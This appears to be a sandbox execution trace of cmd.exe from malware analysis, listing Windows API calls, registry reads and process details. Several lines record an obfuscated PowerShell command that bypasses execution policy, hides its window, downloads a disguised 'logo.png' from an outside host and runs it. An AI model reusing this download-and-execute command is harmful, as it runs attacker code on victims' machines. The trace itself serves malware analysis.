	[0121.052] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e5e8 | out: phkResult=0x18e5e8*=0x44) returned 0x0
	[0121.052] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e5e0, lpData=0x18e600, lpcbData=0x18e5e4*=0x1000 | out: lpType=0x18e5e0*=0x0, lpData=0x18e600*=0x40, lpcbData=0x18e5e4*=0x1000) returned 0x2
	[0121.052] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e5e0, lpData=0x18e600, lpcbData=0x18e5e4*=0x1000 | out: lpType=0x18e5e0*=0x4, lpData=0x18e600*=0x1, lpcbData=0x18e5e4*=0x4) returned 0x0
	[0121.052] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e5e0, lpData=0x18e600, lpcbData=0x18e5e4*=0x1000 | out: lpType=0x18e5e0*=0x0, lpData=0x18e600*=0x1, lpcbData=0x18e5e4*=0x1000) returned 0x2
	[0121.052] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e5e0, lpData=0x18e600, lpcbData=0x18e5e4*=0x1000 | out: lpType=0x18e5e0*=0x4, lpData=0x18e600*=0x0, lpcbData=0x18e5e4*=0x4) returned 0x0
	[0121.052] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e5e0, lpData=0x18e600, lpcbData=0x18e5e4*=0x1000 | out: lpType=0x18e5e0*=0x4, lpData=0x18e600*=0x9, lpcbData=0x18e5e4*=0x4) returned 0x0
	[0121.052] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e5e0, lpData=0x18e600, lpcbData=0x18e5e4*=0x1000 | out: lpType=0x18e5e0*=0x4, lpData=0x18e600*=0x9, lpcbData=0x18e5e4*=0x4) returned 0x0
	[0121.052] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e5e0, lpData=0x18e600, lpcbData=0x18e5e4*=0x1000 | out: lpType=0x18e5e0*=0x0, lpData=0x18e600*=0x9, lpcbData=0x18e5e4*=0x1000) returned 0x2
	[0121.052] RegCloseKey (hKey=0x44) returned 0x0
	[0121.052] time (in: timer=0x0 | out: timer=0x0) returned 0x5d3b2e87
	[0121.052] srand (_Seed=0x5d3b2e87) 
	[0121.052] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0121.053] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0121.053] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0121.053] GetProcessHeap () returned 0x250000
	[0121.053] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x268f20
	[0121.053] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x268f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0121.053] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0121.053] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0121.053] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0121.053] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0121.053] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0121.053] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0121.053] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0121.053] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0121.053] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0121.053] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0121.053] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0121.053] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0121.054] GetProcessHeap () returned 0x250000
	[0121.054] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x269a00 | out: hHeap=0x250000) returned 1
	[0121.054] GetEnvironmentStringsW () returned 0x269140*
	[0121.054] GetProcessHeap () returned 0x250000
	[0121.054] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xaec) returned 0x26bad0
	[0121.054] FreeEnvironmentStringsW (penv=0x269140) returned 1
	[0121.054] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0121.054] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0121.054] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0121.054] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0121.054] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0121.054] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0121.054] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0121.054] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0121.054] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0121.054] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0121.054] GetProcessHeap () returned 0x250000
	[0121.054] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x48) returned 0x268d80
	[0121.054] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f3f0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0121.054] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x104, lpBuffer=0x18f3f0, lpFilePart=0x18f3d0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x18f3d0*="Documents") returned 0x1b
	[0121.054] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0121.054] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f100 | out: lpFindFileData=0x18f100*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Users", cAlternateFileName="")) returned 0x26c5d0
	[0121.054] FindClose (in: hFindFile=0x26c5d0 | out: hFindFile=0x26c5d0) returned 1
	[0121.055] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x18f100 | out: lpFindFileData=0x18f100*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="aETAdzjz", cAlternateFileName="")) returned 0x26c5d0
	[0121.055] FindClose (in: hFindFile=0x26c5d0 | out: hFindFile=0x26c5d0) returned 1
	[0121.055] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", lpFindFileData=0x18f100 | out: lpFindFileData=0x18f100*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x26c5d0
	[0121.055] FindClose (in: hFindFile=0x26c5d0 | out: hFindFile=0x26c5d0) returned 1
	[0121.055] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16
	[0121.055] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0121.055] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 1
	[0121.055] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Documents") returned 1
	[0121.055] GetProcessHeap () returned 0x250000
	[0121.055] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26bad0 | out: hHeap=0x250000) returned 1
	[0121.055] GetEnvironmentStringsW () returned 0x26afd0*
	[0121.055] GetProcessHeap () returned 0x250000
	[0121.055] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb2c) returned 0x26bb10
	[0121.055] FreeEnvironmentStringsW (penv=0x26afd0) returned 1
	[0121.055] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0121.055] GetProcessHeap () returned 0x250000
	[0121.055] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268d80 | out: hHeap=0x250000) returned 1
	[0121.055] GetProcessHeap () returned 0x250000
	[0121.055] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4016) returned 0x26c650
	[0121.056] GetProcessHeap () returned 0x250000
	[0121.056] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x269c80
	[0121.056] GetProcessHeap () returned 0x250000
	[0121.056] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26c650 | out: hHeap=0x250000) returned 1
	[0121.056] GetConsoleOutputCP () returned 0x1b5
	[0121.056] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0121.056] GetUserDefaultLCID () returned 0x409
	[0121.056] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2
	[0121.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f500, cchData=128 | out: lpLCData="0") returned 2
	[0121.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f500, cchData=128 | out: lpLCData="0") returned 2
	[0121.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f500, cchData=128 | out: lpLCData="1") returned 2
	[0121.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2
	[0121.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0121.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0121.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0121.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0121.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0121.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0121.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0121.057] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2
	[0121.057] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0121.057] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0121.058] GetProcessHeap () returned 0x250000
	[0121.058] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x20c) returned 0x269f60
	[0121.058] GetConsoleTitleW (in: lpConsoleTitle=0x269f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0121.058] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0121.058] GetProcAddress (hModule=0x77040000, lpProcName="CopyFileExW") returned 0x770523d0
	[0121.058] GetProcAddress (hModule=0x77040000, lpProcName="IsDebuggerPresent") returned 0x77048290
	[0121.058] GetProcAddress (hModule=0x77040000, lpProcName="SetConsoleInputExeNameW") returned 0x770517e0
	[0121.058] GetProcessHeap () returned 0x250000
	[0121.058] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x26c650
	[0121.058] GetProcessHeap () returned 0x250000
	[0121.058] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4010) returned 0x270670
	[0121.059] GetProcessHeap () returned 0x250000
	[0121.059] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x2649a0
	[0121.059] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0121.059] GetProcessHeap () returned 0x250000
	[0121.059] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2649a0 | out: hHeap=0x250000) returned 1
	[0121.059] GetProcessHeap () returned 0x250000
	[0121.059] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270670 | out: hHeap=0x250000) returned 1
	[0121.059] GetProcessHeap () returned 0x250000
	[0121.059] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4010) returned 0x270670
	[0121.059] GetProcessHeap () returned 0x250000
	[0121.059] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x2649a0
	[0121.059] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0121.059] GetProcessHeap () returned 0x250000
	[0121.059] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2649a0 | out: hHeap=0x250000) returned 1
	[0121.059] GetProcessHeap () returned 0x250000
	[0121.059] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x270670 | out: hHeap=0x250000) returned 1
	[0121.059] GetProcessHeap () returned 0x250000
	[0121.059] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26c650 | out: hHeap=0x250000) returned 1
	[0121.060] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2=")") returned 78
	[0121.060] _wcsicmp (_String1="FOR", _String2="WNjKdpGDFcPRHnV") returned -17
	[0121.060] _wcsicmp (_String1="FOR/?", _String2="WNjKdpGDFcPRHnV") returned -17
	[0121.060] _wcsicmp (_String1="IF", _String2="WNjKdpGDFcPRHnV") returned -14
	[0121.060] _wcsicmp (_String1="IF/?", _String2="WNjKdpGDFcPRHnV") returned -14
	[0121.060] _wcsicmp (_String1="REM", _String2="WNjKdpGDFcPRHnV") returned -5
	[0121.060] _wcsicmp (_String1="REM/?", _String2="WNjKdpGDFcPRHnV") returned -5
	[0121.060] GetProcessHeap () returned 0x250000
	[0121.060] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26a180
	[0121.060] GetProcessHeap () returned 0x250000
	[0121.060] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x2669a0
	[0121.060] GetProcessHeap () returned 0x250000
	[0121.060] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x14) returned 0x268d80
	[0121.061] GetProcessHeap () returned 0x250000
	[0121.061] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26a240
	[0121.061] _wcsicmp (_String1="PowErshelL.eXe", _String2=")") returned 71
	[0121.061] _wcsicmp (_String1="FOR", _String2="PowErshelL.eXe") returned -10
	[0121.061] _wcsicmp (_String1="FOR/?", _String2="PowErshelL.eXe") returned -10
	[0121.062] _wcsicmp (_String1="IF", _String2="PowErshelL.eXe") returned -7
	[0121.062] _wcsicmp (_String1="IF/?", _String2="PowErshelL.eXe") returned -7
	[0121.062] _wcsicmp (_String1="REM", _String2="PowErshelL.eXe") returned 2
	[0121.062] _wcsicmp (_String1="REM/?", _String2="PowErshelL.eXe") returned 2
	[0121.062] GetProcessHeap () returned 0x250000
	[0121.062] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26a300
	[0121.062] GetProcessHeap () returned 0x250000
	[0121.062] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x2669e0
	[0121.433] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0121.433] GetProcessHeap () returned 0x250000
	[0121.433] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x170) returned 0x251a20
	[0121.433] GetProcessHeap () returned 0x250000
	[0121.434] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2d0) returned 0x26b050
	[0121.444] _get_osfhandle (_FileHandle=2) returned 0xb
	[0121.444] GetFileType (hFile=0xb) returned 0x2
	[0121.444] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0121.444] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18eda8 | out: lpMode=0x18eda8) returned 1
	[0121.444] _get_osfhandle (_FileHandle=2) returned 0xb
	[0121.445] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18ede0 | out: lpConsoleScreenBufferInfo=0x18ede0) returned 1
	[0121.445] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4ac96340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d
	[0121.447] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0121.448] GetProcessHeap () returned 0x250000
	[0121.448] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x170) returned 0x251c30
	[0121.448] GetProcessHeap () returned 0x250000
	[0121.448] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2d0) returned 0x26b6b0
	[0121.449] GetStartupInfoW (in: lpStartupInfo=0x18ecb0 | out: lpStartupInfo=0x18ecb0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) 
	[0121.451] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Documents", lpStartupInfo=0x18ebd0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18eb80 | out: lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessInformation=0x18eb80*(hProcess=0x54, hThread=0x50, dwProcessId=0xc54, dwThreadId=0xc58)) returned 1
	[0121.455] CloseHandle (hObject=0x50) returned 1
	[0121.455] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0121.455] GetProcessHeap () returned 0x250000
	[0121.455] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26bb10 | out: hHeap=0x250000) returned 1
	[0121.455] GetEnvironmentStringsW () returned 0x26b8d0*
	[0121.455] GetProcessHeap () returned 0x250000
	[0121.455] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb2c) returned 0x26c820
	[0121.455] FreeEnvironmentStringsW (penv=0x26b8d0) returned 1
	[0121.455] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) 

Process:
	id = "38"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x2e2fb000"
	os_pid = "0xb44"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "34"
	os_parent_pid = "0x6a8"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 307
	os_tid = 0x7dc

	[0121.149] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ffd40 | out: lpSystemTimeAsFileTime=0x2ffd40*(dwLowDateTime=0xc067e5b0, dwHighDateTime=0x1d543d1)) 
	[0121.149] GetCurrentProcessId () returned 0xb44
	[0121.149] GetCurrentThreadId () returned 0x7dc
	[0121.149] GetTickCount () returned 0x2ea1f
	[0121.149] QueryPerformanceCounter (in: lpPerformanceCount=0x2ffd48 | out: lpPerformanceCount=0x2ffd48*=24557535269) returned 1
	[0121.151] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000
	[0121.151] __set_app_type (_Type=0x1) 
	[0121.151] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0
	[0121.151] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0
	[0121.152] GetCurrentThreadId () returned 0x7dc
	[0121.152] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7dc) returned 0x3c
	[0121.152] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0121.152] GetProcAddress (hModule=0x77040000, lpProcName="SetThreadUILanguage") returned 0x77056d40
	[0121.152] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0121.158] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0121.158] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ffcd8 | out: phkResult=0x2ffcd8*=0x0) returned 0x2
	[0121.158] VirtualQuery (in: lpAddress=0x2ffcc0, lpBuffer=0x2ffc40, dwLength=0x30 | out: lpBuffer=0x2ffc40*(BaseAddress=0x2ff000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0121.158] VirtualQuery (in: lpAddress=0x200000, lpBuffer=0x2ffc40, dwLength=0x30 | out: lpBuffer=0x2ffc40*(BaseAddress=0x200000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0121.158] VirtualQuery (in: lpAddress=0x201000, lpBuffer=0x2ffc40, dwLength=0x30 | out: lpBuffer=0x2ffc40*(BaseAddress=0x201000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0121.158] VirtualQuery (in: lpAddress=0x204000, lpBuffer=0x2ffc40, dwLength=0x30 | out: lpBuffer=0x2ffc40*(BaseAddress=0x204000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0121.158] VirtualQuery (in: lpAddress=0x300000, lpBuffer=0x2ffc40, dwLength=0x30 | out: lpBuffer=0x2ffc40*(BaseAddress=0x300000, AllocationBase=0x300000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0121.158] GetConsoleOutputCP () returned 0x1b5
	[0121.158] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0121.159] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1
	[0121.159] _get_osfhandle (_FileHandle=1) returned 0x7
	[0121.159] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0121.159] _get_osfhandle (_FileHandle=1) returned 0x7
	[0121.159] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1
	[0121.159] _get_osfhandle (_FileHandle=1) returned 0x7
	[0121.159] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0121.160] _get_osfhandle (_FileHandle=0) returned 0x3
	[0121.160] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1
